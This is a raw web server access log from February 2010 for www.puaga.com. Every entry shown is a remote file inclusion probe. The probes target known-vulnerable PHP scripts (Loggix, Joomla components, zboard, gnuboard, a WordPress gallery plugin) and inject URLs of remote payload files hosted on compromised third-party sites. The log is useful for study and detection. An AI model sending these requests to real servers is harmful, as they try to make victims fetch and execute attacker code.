62.67.235.148 - - [14/Feb/2010:08:31:47 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:08:31:50 -0800] "GET /logs/access_100123.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:08:31:50 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:08:31:50 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:08:32:08 -0800] "GET /logs/access_100125.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:08:32:15 -0800] "GET /logs/access_100125.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:08:32:43 -0800] "GET /logs/access_100109.log/?option=com_custompages&cpage=http://www.qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:08:32:43 -0800] "GET /logs/?option=com_custompages&cpage=http://www.qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:08:32:43 -0800] "GET /?option=com_custompages&cpage=http://www.qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:08:32:49 -0800] "GET /logs/access.log/?option=com_custompages&cpage=http://www.qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:08:33:42 -0800] "GET /logs/access_100115.log%20%20/agenda.php3?rootagenda=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:08:33:42 -0800] "GET /agenda.php3?rootagenda=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:08:33:42 -0800] "GET /logs/agenda.php3?rootagenda=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:08:33:46 -0800] "GET /agenda.php3?rootagenda=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:08:33:46 -0800] "GET /logs/access_100115.log%20%20/agenda.php3?rootagenda=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:08:33:46 -0800] "GET /logs/agenda.php3?rootagenda=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [14/Feb/2010:08:34:13 -0800] "GET /logs/login.php?board_skin_path=http://sahnsem.com/main/bbs/calendar/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [14/Feb/2010:08:34:13 -0800] "GET /login.php?board_skin_path=http://sahnsem.com/main/bbs/calendar/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [14/Feb/2010:08:34:13 -0800] "GET /logs/access_100115.log%20%20/login.php?board_skin_path=http://sahnsem.com/main/bbs/calendar/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:08:34:17 -0800] "GET /logs/access_100115.log/agenda.php3?rootagenda=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [14/Feb/2010:08:34:26 -0800] "GET /logs/access_100123.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.100.181.217 - - [14/Feb/2010:08:34:26 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.100.181.217 - - [14/Feb/2010:08:34:26 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.78.109.87 - - [14/Feb/2010:08:34:34 -0800] "GET /index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [14/Feb/2010:08:34:38 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [14/Feb/2010:08:34:39 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.11.20.12 - - [14/Feb/2010:08:34:46 -0800] "GET /logs/access_100208.log%20%20//write_ok.php?board_skin_path=http://www.snipeground.com/administrator/components/com_virtuemart/classes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.11.20.12 - - [14/Feb/2010:08:34:46 -0800] "GET /logs//write_ok.php?board_skin_path=http://www.snipeground.com/administrator/components/com_virtuemart/classes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.11.20.12 - - [14/Feb/2010:08:34:46 -0800] "GET /write_ok.php?board_skin_path=http://www.snipeground.com/administrator/components/com_virtuemart/classes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.11.20.12 - - [14/Feb/2010:08:34:56 -0800] "GET /logs/access_100103.log%20%20//write_ok.php?board_skin_path=http://www.snipeground.com/administrator/components/com_virtuemart/classes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [14/Feb/2010:08:34:58 -0800] "GET /logs/access_100111.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.78.109.87 - - [14/Feb/2010:08:34:59 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:08:36:18 -0800] "GET /logs/access_100201.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:08:36:18 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:08:36:19 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
62.140.23.24 - - [14/Feb/2010:08:36:37 -0800] "GET /logs/access_100114.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [14/Feb/2010:08:36:37 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:08:36:37 -0800] "GET /logs/access_100129.log%20%20//main.php?sayfa=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:08:36:37 -0800] "GET /main.php?sayfa=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:08:36:37 -0800] "GET /logs/access_100107.log%20%20//main.php?sayfa=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:08:36:37 -0800] "GET /logs//main.php?sayfa=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [14/Feb/2010:08:36:37 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [14/Feb/2010:08:36:40 -0800] "GET /login.php?board_skin_path=http://sahnsem.com/main/bbs/calendar/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [14/Feb/2010:08:36:40 -0800] "GET /logs/login.php?board_skin_path=http://sahnsem.com/main/bbs/calendar/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [14/Feb/2010:08:36:40 -0800] "GET /logs/access_100115.log%20%20/login.php?board_skin_path=http://sahnsem.com/main/bbs/calendar/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.11.20.41 - - [14/Feb/2010:08:37:04 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.nofaultattorneys.com/images/.bash/id1.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.11.20.41 - - [14/Feb/2010:08:38:39 -0800] "GET /logs/access_100124.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.nofaultattorneys.com/images/.bash/id1.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.11.20.41 - - [14/Feb/2010:08:38:40 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.nofaultattorneys.com/images/.bash/id1.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.11.20.41 - - [14/Feb/2010:08:38:41 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.nofaultattorneys.com/images/.bash/id1.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:08:39:13 -0800] "GET /logs/access_100122.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:08:39:16 -0800] "GET /logs/access_100115.log/agenda.php3?rootagenda=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.11.20.41 - - [14/Feb/2010:08:39:22 -0800] "GET /logs/access_100127.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.nofaultattorneys.com/images/.bash/id1.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.11.20.12 - - [14/Feb/2010:08:39:56 -0800] "GET /logs/access_100122.log//?_zb_path=http://www.opalo.tv/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [14/Feb/2010:08:40:15 -0800] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [14/Feb/2010:08:40:15 -0800] "GET /logs/access_100114.log//accounts/inc/include.php?language=0&lang_settings[0][1]=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [14/Feb/2010:08:40:15 -0800] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:08:40:29 -0800] "GET /logs/access_100115.log/agenda.php3?rootagenda=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [14/Feb/2010:08:40:30 -0800] "GET /logs/access_100115.log//accounts/inc/include.php?language=0&lang_settings[0][1]=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [14/Feb/2010:08:41:20 -0800] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [14/Feb/2010:08:41:20 -0800] "GET /logs/access_100114.log//accounts/inc/include.php?language=0&lang_settings[0][1]=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [14/Feb/2010:08:41:20 -0800] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.11.20.12 - - [14/Feb/2010:08:41:26 -0800] "GET /logs/access_100104.log//?_zb_path=http://www.opalo.tv/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [14/Feb/2010:08:41:34 -0800] "GET /logs/access_100115.log//accounts/inc/include.php?language=0&lang_settings[0][1]=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.11.20.41 - - [14/Feb/2010:08:44:16 -0800] "GET /logs/access_100203.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.nofaultattorneys.com/images/.bash/id1.txt? HTTP/1.0" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:44:57 -0800] "GET /logs/access_100114.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:44:57 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:44:57 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:45:01 -0800] "GET /logs/access_100123.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:45:07 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:45:08 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:45:22 -0800] "GET /logs/access_100123.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:45:22 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:45:24 -0800] "GET /logs/access_100123.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:45:27 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:45:28 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:45:28 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:08:46:02 -0800] "GET /zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:08:46:02 -0800] "GET /logs//zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:08:46:02 -0800] "GET /logs/access_100103.log//zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:08:46:18 -0800] "GET /logs/access_100117.log//zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:46:25 -0800] "GET /logs/access_100111.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
62.140.23.24 - - [14/Feb/2010:08:46:33 -0800] "GET /logs/access_100114.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:46:46 -0800] "GET /logs/access_100111.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:46:46 -0800] "GET /logs/access_100111.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
118.129.166.136 - - [14/Feb/2010:08:47:00 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://ticcamp.co.kr/include/css/idtasikfeel.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.136 - - [14/Feb/2010:08:47:02 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://ticcamp.co.kr/include/css/idtasikfeel.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.136 - - [14/Feb/2010:08:47:07 -0800] "GET /logs/access_100210.log%20%20//bbs/write_comment_update.php?board_skin_path=http://ticcamp.co.kr/include/css/idtasikfeel.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [14/Feb/2010:08:47:12 -0800] "GET /logs/access_100201.log//bbs/skin/buzzard_espoon/setup.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.puaga.com"
118.129.166.136 - - [14/Feb/2010:08:47:34 -0800] "GET /logs/access_100202.log%20%20//bbs/write_comment_update.php?board_skin_path=http://ticcamp.co.kr/include/css/idtasikfeel.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [14/Feb/2010:08:48:37 -0800] "GET /logs/access_100107.log/http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
60.251.165.181 - - [14/Feb/2010:08:48:38 -0800] "GET /http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
60.251.165.181 - - [14/Feb/2010:08:48:39 -0800] "GET /logs/http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
118.129.166.136 - - [14/Feb/2010:08:48:45 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.136 - - [14/Feb/2010:08:48:45 -0800] "GET /logs/access_100203.log%20%20///bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.136 - - [14/Feb/2010:08:48:47 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [14/Feb/2010:08:49:02 -0800] "GET /logs/access_100111.log//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.109.87 - - [14/Feb/2010:08:49:03 -0800] "GET /logs/access_100107.log//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.visionovni.com.ar/uploads/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:49:05 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:08:49:13 -0800] "GET /logs//zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:08:49:13 -0800] "GET /logs/access_100117.log%20%20//zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:08:49:13 -0800] "GET /zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [14/Feb/2010:08:49:24 -0800] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [14/Feb/2010:08:49:24 -0800] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [14/Feb/2010:08:49:25 -0800] "GET /logs/access_100124.log%20%20///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:08:49:33 -0800] "GET /logs/access_100120.log%20%20//zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:08:50:25 -0800] "GET /zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:08:50:25 -0800] "GET /logs/access_100117.log//zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:08:50:25 -0800] "GET /logs//zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [14/Feb/2010:08:50:30 -0800] "GET /logs/access_100116.log%20%20///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [14/Feb/2010:08:50:41 -0800] "GET /logs/access_100115.log%20%20/delete.php?board_skin_path=http://sahnsem.com/main/bbs/calendar/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [14/Feb/2010:08:50:41 -0800] "GET /logs/delete.php?board_skin_path=http://sahnsem.com/main/bbs/calendar/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [14/Feb/2010:08:50:41 -0800] "GET /delete.php?board_skin_path=http://sahnsem.com/main/bbs/calendar/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [14/Feb/2010:08:51:09 -0800] "GET /logs/delete.php?board_skin_path=http://sahnsem.com/main/bbs/calendar/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [14/Feb/2010:08:51:09 -0800] "GET /logs/access_100115.log%20%20/delete.php?board_skin_path=http://sahnsem.com/main/bbs/calendar/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [14/Feb/2010:08:51:18 -0800] "GET /logs/access_100107.log///?_SERVER[DOCUMENT_ROOT]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [14/Feb/2010:08:51:18 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [14/Feb/2010:08:51:19 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
